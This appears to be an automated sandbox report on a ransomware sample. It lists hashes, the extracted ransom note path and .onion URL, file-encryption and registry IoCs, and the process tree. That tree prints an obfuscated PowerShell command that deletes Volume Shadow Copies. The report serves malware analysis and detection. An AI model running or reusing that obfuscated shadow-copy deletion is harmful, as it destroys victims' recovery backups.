Analysis
-
max time kernel
15s -
max time network
66s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
16-01-2021 16:12
Static task
static1
Behavioral task
behavioral1
Sample
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
Resource
win10v20201028
General
-
Target
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
-
Size
59KB
-
MD5
0ed51a595631e9b4d60896ab5573332f
-
SHA1
7ae73b5e1622049380c9b615ce3b7f636665584b
-
SHA256
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60
-
SHA512
9bfd6318b120c05d9a42a456511efc59f2be5ad451baa6d19d5de776e2ff74dbee444c85478ee7cfdbf705517cc147cd64c6814965f76c740fe1924594a37cb5
Malware Config
Extracted
C:\\README.13f17753.TXT
http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW
Signatures
-
Modifies extensions of user files 16 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exedescription ioc process File renamed C:\Users\Admin\Pictures\DisableCheckpoint.raw => C:\Users\Admin\Pictures\DisableCheckpoint.raw.13f17753 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe File opened for modification C:\Users\Admin\Pictures\DisableCheckpoint.raw.13f17753 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe File renamed C:\Users\Admin\Pictures\OptimizeOut.crw => C:\Users\Admin\Pictures\OptimizeOut.crw.13f17753 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe File opened for modification C:\Users\Admin\Pictures\OptimizeOut.crw.13f17753 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe File opened for modification C:\Users\Admin\Pictures\SkipResume.png.13f17753 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe File renamed C:\Users\Admin\Pictures\CompareEnter.raw => C:\Users\Admin\Pictures\CompareEnter.raw.13f17753 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe File opened for modification C:\Users\Admin\Pictures\CompareEnter.raw.13f17753 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe File opened for modification C:\Users\Admin\Pictures\CompleteRegister.crw.13f17753 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe File renamed C:\Users\Admin\Pictures\FormatWait.png => C:\Users\Admin\Pictures\FormatWait.png.13f17753 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe File renamed C:\Users\Admin\Pictures\CompleteRegister.crw => C:\Users\Admin\Pictures\CompleteRegister.crw.13f17753 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe File renamed C:\Users\Admin\Pictures\HideCompare.tif => C:\Users\Admin\Pictures\HideCompare.tif.13f17753 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe File renamed C:\Users\Admin\Pictures\SkipResume.png => C:\Users\Admin\Pictures\SkipResume.png.13f17753 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe File opened for modification C:\Users\Admin\Pictures\UnpublishExpand.crw.13f17753 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe File opened for modification C:\Users\Admin\Pictures\FormatWait.png.13f17753 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe File opened for modification C:\Users\Admin\Pictures\HideCompare.tif.13f17753 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe File renamed C:\Users\Admin\Pictures\UnpublishExpand.crw => C:\Users\Admin\Pictures\UnpublishExpand.crw.13f17753 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\13f17753.BMP" 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\13f17753.BMP" 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe -
Modifies Control Panel 1 IoCs
Processes:
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Desktop\WallpaperStyle = "10" 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe -
Modifies registry class 5 IoCs
Processes:
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.13f17753 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.13f17753\ = "13f17753" 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\13f17753\DefaultIcon 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\13f17753 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\13f17753\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\13f17753.ico" 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exe243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exepid process 1584 powershell.exe 1584 powershell.exe 1584 powershell.exe 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeSecurityPrivilege 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeTakeOwnershipPrivilege 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeLoadDriverPrivilege 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeSystemProfilePrivilege 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeSystemtimePrivilege 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeProfSingleProcessPrivilege 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeIncBasePriorityPrivilege 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeCreatePagefilePrivilege 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeBackupPrivilege 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeRestorePrivilege 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeShutdownPrivilege 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeDebugPrivilege 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeSystemEnvironmentPrivilege 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeRemoteShutdownPrivilege 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeUndockPrivilege 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeManageVolumePrivilege 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: 33 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: 34 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: 35 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: 36 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeDebugPrivilege 1584 powershell.exe Token: SeBackupPrivilege 936 vssvc.exe Token: SeRestorePrivilege 936 vssvc.exe Token: SeAuditPrivilege 936 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exedescription pid process target process PID 1140 wrote to memory of 1584 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe powershell.exe PID 1140 wrote to memory of 1584 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe"C:\Users\Admin\AppData\Local\Temp\243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
010c219c46b4439bc787644989e20389
SHA1f3a63066ab4446458bd6417386777e39e09b9b25
SHA2562a7c264d94398912c720de578b6d959b2457582182b8f2cc98281f27ef6701aa
SHA512c6967d2a37b9a45f491138b638d99e5fa09ef38f680c887bfbc2336c683deae86f4d6626f6defc8c0aabccf545923a708df05825de8102086a8f333a58e74963
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
dc7fea20798126457bee02ede3690164
SHA1abfc2ec2d1c29bcf7deedb1cbcd864108eff9d02
SHA25664e4a1402bcd5107f23949a98b608c108856a5da1f08ec016aad39425fb0d6ae
SHA5121d8c1f9db7d8a17dddb005407f49a47bae3400b8d0f091653e7b22d5fdeb083c9749e018debdd8c9b2d7b7d4767b2a6455c693c09ba8c29c36dca43a553ec650
-
memory/1584-2-0x0000000000000000-mapping.dmp
-
memory/1584-3-0x00007FFB55FB0000-0x00007FFB5699C000-memory.dmpFilesize
9.9MB
-
memory/1584-4-0x000001B2FA430000-0x000001B2FA431000-memory.dmpFilesize
4KB
-
memory/1584-5-0x000001B2FD0D0000-0x000001B2FD0D1000-memory.dmpFilesize
4KB